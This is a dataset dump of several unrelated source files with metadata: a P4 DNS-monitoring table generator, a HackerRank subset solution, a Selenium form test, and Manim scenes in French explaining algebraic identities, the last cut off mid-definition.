partsDict.pop(\"headers.q2_part1.part\")\n partsDict.pop(\"headers.q2_part2.part\")\n partsDict.pop(\"headers.q2_part4.part\")\n partsDict.pop(\"headers.q2_part8_1.part\")\n partsDict.pop(\"headers.q2_part8_2.part\")\n partsDict.pop(\"headers.q2_part16_1.part\")\n partsDict.pop(\"headers.q2_part16_2.part\")\n partsDict.pop(\"headers.q2_part16_3.part\")\n partsDict.pop(\"headers.q2_part16_4.part\")\n return partsDict\n\n part2Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part2Spec[0] == '1':\n partsDict[\"headers.q2_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part2Spec[1] == '1':\n partsDict[\"headers.q2_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part2Spec[2] == '1':\n partsDict[\"headers.q2_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part2Spec[3] == '1':\n partsDict[\"headers.q2_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part2Spec[4] == '1':\n partsDict[\"headers.q2_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 
4\n partsDict[\"headers.q2_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart3ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q3_part1.part\")\n partsDict.pop(\"headers.q3_part2.part\")\n partsDict.pop(\"headers.q3_part4.part\")\n partsDict.pop(\"headers.q3_part8_1.part\")\n partsDict.pop(\"headers.q3_part8_2.part\")\n partsDict.pop(\"headers.q3_part16_1.part\")\n partsDict.pop(\"headers.q3_part16_2.part\")\n partsDict.pop(\"headers.q3_part16_3.part\")\n partsDict.pop(\"headers.q3_part16_4.part\")\n return partsDict\n\n part3Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part3Spec[0] == '1':\n partsDict[\"headers.q3_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part3Spec[1] == '1':\n partsDict[\"headers.q3_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part3Spec[2] == '1':\n partsDict[\"headers.q3_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part3Spec[3] == '1':\n partsDict[\"headers.q3_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part3Spec[4] == '1':\n partsDict[\"headers.q3_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart4ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q4_part1.part\")\n partsDict.pop(\"headers.q4_part2.part\")\n partsDict.pop(\"headers.q4_part4.part\")\n partsDict.pop(\"headers.q4_part8_1.part\")\n partsDict.pop(\"headers.q4_part8_2.part\")\n partsDict.pop(\"headers.q4_part16_1.part\")\n partsDict.pop(\"headers.q4_part16_2.part\")\n partsDict.pop(\"headers.q4_part16_3.part\")\n partsDict.pop(\"headers.q4_part16_4.part\")\n return partsDict\n\n part4Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part4Spec[0] == '1':\n partsDict[\"headers.q4_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part4Spec[1] == '1':\n partsDict[\"headers.q4_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part4Spec[2] == '1':\n partsDict[\"headers.q4_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part4Spec[3] == '1':\n partsDict[\"headers.q4_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part4Spec[4] == '1':\n partsDict[\"headers.q4_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_3.part\"] = 
[part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart5ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q5_part1.part\")\n partsDict.pop(\"headers.q5_part2.part\")\n partsDict.pop(\"headers.q5_part4.part\")\n partsDict.pop(\"headers.q5_part8_1.part\")\n partsDict.pop(\"headers.q5_part8_2.part\")\n partsDict.pop(\"headers.q5_part16_1.part\")\n partsDict.pop(\"headers.q5_part16_2.part\")\n partsDict.pop(\"headers.q5_part16_3.part\")\n partsDict.pop(\"headers.q5_part16_4.part\")\n return partsDict\n\n part5Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part5Spec[0] == '1':\n partsDict[\"headers.q5_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part5Spec[1] == '1':\n partsDict[\"headers.q5_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part5Spec[2] == '1':\n partsDict[\"headers.q5_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part5Spec[3] == '1':\n partsDict[\"headers.q5_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part5Spec[4] == '1':\n partsDict[\"headers.q5_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\npart5Dict = {}\npart4Dict = {}\npart3Dict = {}\npart2Dict = {}\npart1Dict = {}\n\n# If len(parts)==1\ndef oneparts(parts):\n if parts[0] in part1Dict:\n return part1Dict[parts[0]]\n global globalID1\n global priority1\n globalID1 = globalID1 + 1\n part1Dict[parts[0]] = globalID1\n\n dict_t = dictSetUp(1)\n addPart1ToDict(parts[0], dict_t)\n\n if (parts[0] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": 1,\n \"action_params\": {\"q1id\": globalID1}\n })\n return globalID1\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": priority1,\n \"action_params\": {\"q1id\": globalID1}\n })\n priority1 = priority1 - 1\n\n return globalID1\n\n# If len(parts)==2\ndef twoparts(parts):\n \n if parts[1] in part2Dict:\n return part2Dict[parts[1]]\n global globalID2\n global priority2\n globalID2 = globalID2 + 1\n part2Dict[parts[1]] = globalID2\n\n dict_t = dictSetUp(2)\n addPart2ToDict(parts[1], dict_t)\n\n if (parts[1] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": 1,\n \"action_params\": {\"q2id\": globalID2}\n })\n return globalID2\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": priority2,\n \"action_params\": {\"q2id\": globalID2}\n })\n priority2 = 
priority2 - 1\n return globalID2\n\n# If len(parts)==3\ndef threeparts(parts):\n \n if parts[2] in part3Dict:\n return part3Dict[parts[2]]\n global globalID3\n global priority3\n globalID3 = globalID3 + 1\n part3Dict[parts[2]] = globalID3\n\n dict_t = dictSetUp(3)\n addPart3ToDict(parts[2], dict_t)\n\n if (parts[2] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": 1,\n \"action_params\": {\"q3id\": globalID3}\n })\n return globalID3\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": priority3,\n \"action_params\": {\"q3id\": globalID3}\n })\n priority3 = priority3 - 1\n return globalID3\n\n# If len(parts)==4\ndef fourparts(parts):\n \n if parts[3] in part4Dict:\n return part4Dict[parts[3]]\n global globalID4\n global priority4\n globalID4 = globalID4 + 1\n part4Dict[parts[3]] = globalID4\n\n dict_t = dictSetUp(4)\n addPart4ToDict(parts[3], dict_t)\n\n if (parts[3] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": 1,\n \"action_params\": {\"q4id\": globalID4}\n })\n return globalID4\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": priority4,\n \"action_params\": {\"q4id\": globalID4}\n })\n priority4 = priority4 - 1\n return globalID4\n\n# If len(parts)==5\ndef fiveparts(parts):\n \n if parts[4] in part5Dict:\n return part5Dict[parts[4]]\n global globalID5\n global priority5\n globalID5 = globalID5 + 1\n part5Dict[parts[4]] = globalID5\n\n dict_t = dictSetUp(5)\n addPart5ToDict(parts[4], dict_t)\n\n if (parts[4] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": 1,\n \"action_params\": {\"q5id\": globalID5}\n })\n return globalID5\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": priority5,\n \"action_params\": {\"q5id\": globalID5}\n })\n priority5 = priority5 - 1\n return globalID5\n\ndef creatDomainEntry(parts):\n id5 = fiveparts(parts)\n id4 = fourparts(parts)\n id3 = threeparts(parts)\n id2 = twoparts(parts)\n id1 = oneparts(parts)\n\n global globalID\n globalID = globalID + 1\n\n idDict = {\n \"user_metadata.q1_id\": id1,\n \"user_metadata.q2_id\": id2,\n \"user_metadata.q3_id\": id3,\n \"user_metadata.q4_id\": id4,\n \"user_metadata.q5_id\": id5\n }\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsmatch_known_domain_list\",\n \"match\": idDict,\n \"action_name\": \"TopIngress.match_domain\",\n \"action_params\": {\"id\": globalID}\n })\n\n\ndef addDomainToTable(domain):\n parts = domain.split('.')\n numParts = len(parts)\n if numParts > 5:\n print(\"error: \" + domain)\n return -1\n if numParts == 1:\n parts.append('')\n parts.append('')\n parts.append('')\n parts.append('')\n creatDomainEntry(parts)\n creatDomainEntryT(parts)\n elif numParts == 2:\n parts.append('')\n parts.append('')\n parts.append('')\n creatDomainEntry(parts)\n parts[0] = parts[0] + '.'\n creatDomainEntryT(parts)\n elif numParts == 3:\n parts.append('')\n 
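# --- aside -------------------------------------------------------------------
# Illustration only (not part of the generated runtime rules): the unrolled
# addPartNToDict helpers above carve one domain label into 1/2/4/8/16-byte
# chunks according to the bits of its length, which is what toReversedBinary()
# encodes. A self-contained sketch of that decomposition; split_label is a
# hypothetical name used only for this note:
def split_label(label):
    chunks = []
    index = 0
    for width in (1, 2, 4, 8, 16):      # qN_part1 .. qN_part16 field sizes
        if len(label) & width:          # bit set => that field is populated
            chunks.append(label[index:index + width])
            index += width
    return chunks
# split_label('example') -> ['e', 'xa', 'mple'], since 7 = 1 + 2 + 4; the 8-
# and 16-byte chunks are then packed into two and four 4-byte table fields,
# exactly as hand-unrolled in the functions above.
# --- end aside -----------------------------------------------------------------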
parts.append('')\n        creatDomainEntry(parts)\n        parts[0] = parts[0] + '.'\n        parts[1] = parts[1] + '.'\n        creatDomainEntryT(parts)\n    elif numParts == 4:\n        parts.append('')\n        creatDomainEntry(parts)\n        parts[0] = parts[0] + '.'\n        parts[1] = parts[1] + '.'\n        parts[2] = parts[2] + '.'\n        creatDomainEntryT(parts)\n    elif numParts == 5:\n        creatDomainEntry(parts)\n        parts[0] = parts[0] + '.'\n        parts[1] = parts[1] + '.'\n        parts[2] = parts[2] + '.'\n        parts[3] = parts[3] + '.'\n        creatDomainEntryT(parts)\n\ndef addBannedIpToTable(ip):\n    # ip is 'a.b.c.d/len' or a bare address (treated as a /32 host route).\n    ipList = ip.split('/')\n    if len(ipList) == 2:\n        mask = int(ipList[1])\n    elif len(ipList) == 1:\n        mask = 32\n    else:\n        raise SystemExit('unrecognized CIDR: ' + ip)\n    ipaddr = ipList[0]\n    ip_dict = {\n        \"headers.ipv4.dst\": [ipaddr, mask]\n    }\n    data[\"table_entries\"].append({\n        \"table\": \"TopIngress.banned_dns_dst\",\n        \"match\": ip_dict,\n        \"action_name\": \"TopIngress.match_banned_dns_dst\",\n        \"action_params\": {}\n    })\n\ndef addAllowedIpToTable(ip):\n    # Same CIDR handling as addBannedIpToTable, but fills the allow table.\n    ipList = ip.split('/')\n    if len(ipList) == 2:\n        mask = int(ipList[1])\n    elif len(ipList) == 1:\n        mask = 32\n    else:\n        raise SystemExit('unrecognized CIDR: ' + ip)\n    ipaddr = ipList[0]\n    ip_dict = {\n        \"headers.ipv4.dst\": [ipaddr, mask]\n    }\n    data[\"table_entries\"].append({\n        \"table\": \"TopIngress.allowable_dns_dst\",\n        \"match\": ip_dict,\n        \"action_name\": \"NoAction\",\n        \"action_params\": {}\n    })\n\nwith open('known_domains.txt', 'r') as knownlist:\n    domains = knownlist.read().split()\n\n# Starting priorities for the trailing-dot ('T') table variants.\npriority1T = len(domains) + 1\npriority2T = len(domains) + 1\npriority3T = len(domains) + 1\npriority4T = len(domains) + 1\npriority5T = len(domains) + 1\n\nfor d in domains:\n    addDomainToTable(d)\n\nwith open('banned_dns_dst.txt', 'r') as bannedlist:\n    bannedip = bannedlist.read().split()\n\n# Default for the ban table: unmatched destinations pass through untouched.\ndata[\"table_entries\"].append({\n    \"table\": \"TopIngress.banned_dns_dst\",\n    \"default_action\": True,\n    \"action_name\": \"NoAction\",\n    \"action_params\": {}\n})\n\nfor ip in bannedip:\n    addBannedIpToTable(ip)\n\nwith open('allowed_dns_dst.txt', 'r') as allowedlist:\n    allowedip = allowedlist.read().split()\n\n# Default for the allow table: anything not whitelisted is treated as banned.\ndata[\"table_entries\"].append({\n    \"table\": \"TopIngress.allowable_dns_dst\",\n    \"default_action\": True,\n    \"action_name\": \"TopIngress.match_banned_dns_dst\",\n    \"action_params\": {}\n})\n\nfor ip in allowedip:\n    addAllowedIpToTable(ip)\n\nwith open('s1-runtime.json', 'w') as outFile:\n    json.dump(data, outFile, indent='\\t')\n\n","sub_path":"Combined_Netassay/comb_json_155.py","file_name":"comb_json_155.py","file_ext":"py","file_size_in_byte":49321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"611095769","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\r\nt=int(input())\r\nfor i in range(t):\r\n na=int(input())\r\n a=input().split()\r\n a=set(a)\r\n nb=int(input())\r\n b=input().split()\r\n b=set(b)\r\n if a.intersection(b)==a:\r\n print(True)\r\n else:\r\n print(False)","sub_path":"Python/Check Subset.py","file_name":"Check Subset.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"572131059","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.support.ui import Select\nimport conf\n\nd = webdriver.Firefox()\nd.implicitly_wait(10)\n\ndef s(name, val, submit=None, ty=None):\n\tif not ty:\n\t\te = d.find_element_by_name(name)\n\t\te.send_keys(val)\n\telif ty == 'radio':\n\t\te = d.find_element_by_css_selector(\"input[name='{}'][value='{}']\".format(name, val))\n\t\te.click()\n\tif submit:\n\t\te.submit()\n\ndef a(val, text, ty='eq', sel='id'):\n\tif sel == 'id':\n\t\te = d.find_element_by_id(val)\n\telif sel == 'css':\n\t\te = d.find_element_by_css_selector(val)\t\n\t# print(e.text)\n\tif ty == 'eq':\n\t\tassert text == e.text\n\telif ty == 'in':\n\t\tassert text in e.text\n\n# login\nd.get(conf.url + 'auth/login')\ns('identity', conf.identity)\ns('password', conf.password, 1)\n# add report\nd.get(conf.url + 'home/lang/english')\nd.get(conf.url + 'monitor/add/5')\ns('entry_name', 'entry_name')\ns('entry_url', 'entry_url')\n# s('entry_dur', '46')\ns('entry_d', '2018-12-17')\ns('report_gender_num_male', '7')\ns('report_gender_num_female', '1')\ns('report_gender_text', 'gender comment')\ns('report_groups_concern', 'low', None, 'radio')\n\"\"\"\n 'entry_type_audio', '1'\n 'entry_type_video', '1'\n 'entry_category_id', '5'\n\"\"\"\n# langs\nfor i, keys in enumerate([[Keys.DOWN, Keys.RETURN], [Keys.DOWN, Keys.DOWN, Keys.RETURN]]):\n\ti = str(i + 1)\n\tsel_t = '[name=\"entry_lang_{}_name\"]'.format(i)\n\td.execute_script(\"$('{}').select2('open');\".format(sel_t))\n\td.find_element_by_name('entry_lang_{}_name'.format(i)).send_keys(keys)\n\td.execute_script(\"$('{}').select2('close');\".format(sel_t))\n\t# add one more lang\n\td.find_element_by_name('entry_lang').click()\n\nfor i, val in enumerate(['mostly', 'barely']):\n\ts('entry_lang_{}_part'.format(i + 1), val, None, 'radio')\n\n# main ideas\ns('report_main_text_1', 'idea 1')\ns('report_main_text_2', 'idea 2')\ns('report_main_text_3', 'idea 1')\ns('report_main_text_5', 'idea 3')\ne = d.find_element_by_name('report_main_text')\ne.click()\ne.click()\ne.click()\ns('report_main_text_8', 'idea 4')\n# statements\nsts = [\n\t[\t'statement 1', 'statement1-author-name', 'male', 'statement1-author-religion',\n\t\t['12', 'statement1-author-ethn1'], [\n\t\t\t[['16', '7', 'statement1-group1'], 'rather_negative', 'no', 'no', \n\t\t\t'statement1-quote', 'statement1-term']\n\t\t]\n\t],\n\t[\t'statement2-text', 'statement2-author-name', 'female', 'statement2-author-religion',\n\t\t['12', '10', 'http:', 'statement2-author-ethn1'], [\n\t\t\t[['16', '13', 'statement2-author-group1'], 'rather_positive', 'no', 'yes',\n\t\t\t'statement2-quote', 'statement2-term'],\n\t\t\t[['6'], 'neutral', 'yes', 'no', \n\t\t\t'statement2-group2-quote', 'statement2-group2-term']\n\t\t]\n\t]\n]\ni = 1\nfor text, a_name, a_gen, a_rel, a_ethn, grps in sts:\n\t# print(grps)\n\ts('statement_{}_text'.format(i), text)\n\ts('statement_{}_author_gender'.format(i), a_gen, None, 'radio')\n\t# author name religion ethnicity\n\tatr = 
[\n\t\t['statement_{}_author_name', [a_name]], \n\t\t['statement_{}_author_religion', [a_rel]],\n\t\t['statement_{}_author_ethnicity[]', a_ethn]\n\t]\n\tfor n, t in atr:\n\t\tni = n.format(i)\n\t\tnni = '[name=\"{}\"]'.format(ni)\n\t\td.execute_script(\"$('{}').select2('destroy')\".format(nni))\n\t\td.execute_script(\"options['%s'] = [%s];\" % (ni, ','.join(\n\t\t\t[\"{'id':'%s','text':'%s', 'selected': true}\" % (o, o) for o in t])))\n\t\td.execute_script(\"$('{}').each(set_select2);\".format(nni))\n\t# groups\n\tj = 1\n\tfor g_ids, g_atd, g_gen_assoc, g_sexism, g_quotes, g_terms in grps:\n\t\tni = 'statement_{}_group_{}_id[]'.format(i, j)\n\t\tnni = '[name=\"{}\"]'.format(ni)\n\t\td.execute_script(\"$('{}').select2('destroy')\".format(nni))\n\t\td.execute_script(\"options['%s'] = [%s];\" % (ni, ','.join(\n\t\t\t[\"{'id':'%s','text':'%s', 'selected': true}\" % (gi, gi) for gi in g_ids])))\n\t\td.execute_script(\"$('{}').each(set_select2);\".format(nni))\n\n\t\ts('statement_{}_group_{}_attitude_type'.format(i, j), g_atd, None, 'radio')\n\t\ts('statement_{}_group_{}_gender_association'.format(i, j), g_gen_assoc, None, 'radio')\n\t\ts('statement_{}_group_{}_sexism'.format(i, j), g_sexism, None, 'radio')\n\t\ts('statement_{}_group_{}_quotes'.format(i, j), g_quotes)\n\t\ts('statement_{}_group_{}_terms'.format(i, j), g_terms)\n\t\t# add new group\n\t\td.find_element_by_name('statement_{}_group'.format(i)).click()\n\t\tj += 1\n\n\td.find_element_by_name('statement').click()\n\ti += 1\n\ns('report_text', 'a comment', 1)\n# check report\na('entry_name', 'entry_name')\n# a('entry_dur', '46')\na('report_gender_text', 'gender comment')\na('report_main_text', 'idea 1', 'in')\na('report_main_text', 'idea 2', 'in')\na('report_main_text', 'idea 3', 'in')\na('report_main_text', 'idea 4', 'in')\n# a()\na('report_text', 'a comment')\n# d.close() \n","sub_path":"tests/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"173596211","text":"from manimlib.imports import *\r\n\r\n\r\n# 0. Thumbnail\r\n# 1. Menu\r\n# 2. Motivation (Distributivite)\r\n# 3. IdentitesRemarquables\r\n# 4. IdRem1 (preuve algebrique: (a+b)^2)\r\n# 5. MeasuredIdentity (preuve geometrique: (a+b)^2 = a^2 + b^2 + 2ab)\r\n# 6. IdRem2 (preuve algebrique: (a-b)^2)\r\n# 7. IdRem3 (preuve algebrique: (a-b)(a+b))\r\n# 8. Exercises1 (1 de chaque) (TO-DO)\r\n# 9. Exercises2 supp. 
(TO-DO)\r\n\r\n\r\ncolor_map = {\r\n r\"{a}\": BLUE,\r\n r\"{b}\": YELLOW,\r\n}\r\n\r\nclass Thumbnail(Scene):\r\n CONFIG = {\r\n \"square_scale\": 1,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n def construct(self):\r\n path = r\"C:/Users/Utilisateur/Desktop/CEGEP/MANIM/manim-recent/media/images/\"\r\n image_peinture = ImageMobject(path + \"kondo_id_rem\")\r\n image_peinture.scale(4)\r\n #image_peinture.to_edge(DOWN)\r\n\r\n line_expand = TextMobject(\"$a^{2}+b^{2}$\").set_color(BLACK).scale(1.5)\r\n line_expand.next_to(4.9*LEFT + 3.65*UP)\r\n\r\n line_factor = TextMobject(r\"$a^{2}-b^{2}$\").set_color(BLACK).scale(1.65)\r\n line_factor.next_to(2.1*RIGHT + 3.65*UP)\r\n\r\n self.play(FadeIn(image_peinture))\r\n self.play(Write(line_expand), Write(line_factor))\r\n self.wait(5)\r\n\r\n\r\nclass Menu(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Menu}\", color=PURPLE).to_corner(UL).scale(1.5)\r\n\r\n l = NumberedList(\r\n *\"\"\"1) Motivation, 2) Identités remarquabless\"\"\".split(\",\"), dot_color=BLUE\r\n )\r\n\r\n #l = NumberedList(*[\"Révision des axiomes\", \"Riemann Hypothesis\", \"P vs NP Problem\"], dot_color=BLUE)\r\n l.scale(1)\r\n l.shift(0.5 * DOWN + 3*LEFT)\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(l))\r\n self.wait()\r\n\r\n #self.play(l.fade_all_but, 3)\r\n self.wait(15)\r\n\r\n\r\n\r\nclass Motivation(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Motivation}\", color=PURPLE).to_corner(UL).scale(1.25)\r\n\r\n l = NumberedList(\r\n *\"\"\"1) Accélérer des calculs, 2) Factoriser, 3) Développer des expressionssss\"\"\".split(\",\"), dot_color=BLUE\r\n )\r\n\r\n #l = NumberedList(*[\"Révision des axiomes\", \"Riemann Hypothesis\", \"P vs NP Problem\"], dot_color=BLUE)\r\n l.scale(1)\r\n l.shift(0.5 * DOWN + 3*LEFT)\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(l))\r\n self.wait()\r\n\r\n #self.play(l.fade_all_but, 3)\r\n self.wait(15)\r\n\r\n\r\nclass IdentitesRemarquables(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Les Identités Remarquables}\").to_corner(UL).scale(1)\r\n context = TextMobject(r\"Soit $a,b\\in\\mathbb{R}$, alors on a }\")\r\n context.next_to([-6.75, 2, 0])\r\n\r\n eq_1 = TextMobject(r\"1) \", r\"$(a+b)^{2}=a^{2}+2ab+b^{2}$\").scale(1)\r\n eq_2 = TextMobject(r\"2) \", r\"$(a-b)^{2}=a^{2}-2ab+b^{2}$\").scale(1)\r\n eq_3 = TextMobject(r\"3) \", r\"$(a-b)(a+b)=a^{2}-b^{2}$\").scale(1)\r\n\r\n nom_1 = TextMobject(r\"\", r\"IR1\").scale(1).set_color(RED)\r\n nom_2 = TextMobject(r\"\", r\"IR2\").scale(1).set_color(BLUE)\r\n nom_3 = TextMobject(r\"\", r\"IR3\").scale(1).set_color(YELLOW)\r\n\r\n eq_1[1].set_color(RED)\r\n eq_2[1].set_color(BLUE)\r\n eq_3[1].set_color(YELLOW)\r\n\r\n eq_1.next_to([-6, 0.75, 0], RIGHT)\r\n nom_1.next_to(eq_1, RIGHT, buff=LARGE_BUFF)\r\n eq_2.next_to(eq_1, DOWN, buff=LARGE_BUFF)\r\n nom_2.next_to(eq_2, RIGHT, buff=LARGE_BUFF).align_to(nom_1, LEFT)\r\n eq_3.next_to(eq_2, DOWN, buff=LARGE_BUFF)\r\n nom_3.next_to(eq_3, RIGHT, buff=LARGE_BUFF).align_to(nom_2, LEFT)\r\n\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(context))\r\n self.wait(5)\r\n self.play(Write(eq_1), Write(nom_1))\r\n self.wait(3)\r\n self.play(Write(eq_2), Write(nom_2))\r\n self.wait(3)\r\n self.play(Write(eq_3), Write(nom_3))\r\n self.wait(25)\r\n\r\n\r\nclass IdRem1(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR1}\", color=RED).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a+b)^{2}$\", 
r\" $=$\", r\" $(a+b)(a+b)$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Par définition)\").scale(0.9)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$\",r\"$a^{2}+ab+ba+b^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Par distributivité)\").scale(0.9)\r\n eq_2[0].next_to(eq_1, DOWN, buff=LARGE_BUFF).align_to(eq_1[1], LEFT)\r\n eq_2[1].next_to(eq_2[0], RIGHT, buff=LARGE_BUFF).align_to(eq_1[2], LEFT)\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}+ab+ab+b^{2}$\").scale(1.1)\r\n justification_3 = TextMobject(r\"(Par commutativité)\").scale(0.9)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n justification_3.next_to(eq_3[1], RIGHT, buff=LARGE_BUFF).align_to(justification_2, RIGHT)\r\n\r\n eq_4 = TextMobject(r\" $=$\", r\"$a^{2}+2ab+b^{2}$\").scale(1.1)\r\n eq_4[0].next_to(eq_3, DOWN, buff=LARGE_BUFF).align_to(eq_3[0], LEFT)\r\n eq_4[1].next_to(eq_4[0], RIGHT, buff=LARGE_BUFF).align_to(eq_3[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n self.play(Write(justification_1))\r\n self.wait(3)\r\n self.play(Write(eq_2))\r\n self.wait(5)\r\n self.play(Write(justification_2))\r\n self.wait(3)\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(justification_3))\r\n self.wait(5)\r\n self.play(Write(eq_4))\r\n self.wait(3)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\n\r\nclass IdRem2(Scene):\r\n def 